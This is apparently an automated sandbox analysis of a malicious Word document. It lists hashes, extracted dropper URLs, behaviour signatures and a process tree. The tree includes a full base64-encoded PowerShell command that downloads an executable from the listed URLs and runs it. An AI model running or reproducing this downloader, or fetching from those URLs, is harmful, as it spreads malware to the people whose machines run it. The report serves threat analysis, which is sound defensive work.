Analysis

  • max time kernel
    129s
  • max time network
    75s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 05:25

General

  • Target

    flujakpb.doc

  • Size

    173KB

  • MD5

    9dc6c15bd5cadbea76473ca0a61270d0

  • SHA1

    a1e18ac08b98c88a49da1b8afa527468a102fd0d

  • SHA256

    56916942bc59a1ae0cc030beaf907b54631390e0a5fa7d75bce1f120df88d843

  • SHA512

    ef06ec05fa2463a2f32defb87d796ff0fb88d3d9c8f2169b19683b6620e4e18dab86b69ae8649d59d2cc280293ec1f070443e9d69ad7018b20fee14a789f05a4

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://prolicitar.com.br/privilege/VwWMjYDU/

exe.dropper

http://proreclame.nl/assets/Riw/

exe.dropper

http://www.meltonian.net/Blog/Zaviixl730/

exe.dropper

http://www.mollymoody.com/iRVKRMq/

exe.dropper

https://mwrouse.com/cs2300/qVJaPCy/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\flujakpb.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1188
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1920
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1288

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1188-70-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-63-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1188-54-0x00000000728E1000-0x00000000728E4000-memory.dmp
      Filesize

      12KB

    • memory/1188-58-0x000000007134D000-0x0000000071358000-memory.dmp
      Filesize

      44KB

    • memory/1188-59-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-64-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-71-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-62-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-61-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-60-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-68-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-67-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-72-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-65-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-69-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-57-0x0000000076451000-0x0000000076453000-memory.dmp
      Filesize

      8KB

    • memory/1188-55-0x0000000070361000-0x0000000070363000-memory.dmp
      Filesize

      8KB

    • memory/1188-66-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-73-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-74-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-75-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-76-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-77-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-78-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-79-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-80-0x00000000005B3000-0x00000000005B7000-memory.dmp
      Filesize

      16KB

    • memory/1188-87-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1288-83-0x00000000024E4000-0x00000000024E7000-memory.dmp
      Filesize

      12KB

    • memory/1288-82-0x000007FEF38D0000-0x000007FEF442D000-memory.dmp
      Filesize

      11.4MB

    • memory/1288-84-0x00000000024EB000-0x000000000250A000-memory.dmp
      Filesize

      124KB

    • memory/1288-81-0x000007FEFBDC1000-0x000007FEFBDC3000-memory.dmp
      Filesize

      8KB

    • memory/1920-85-0x0000000000000000-mapping.dmp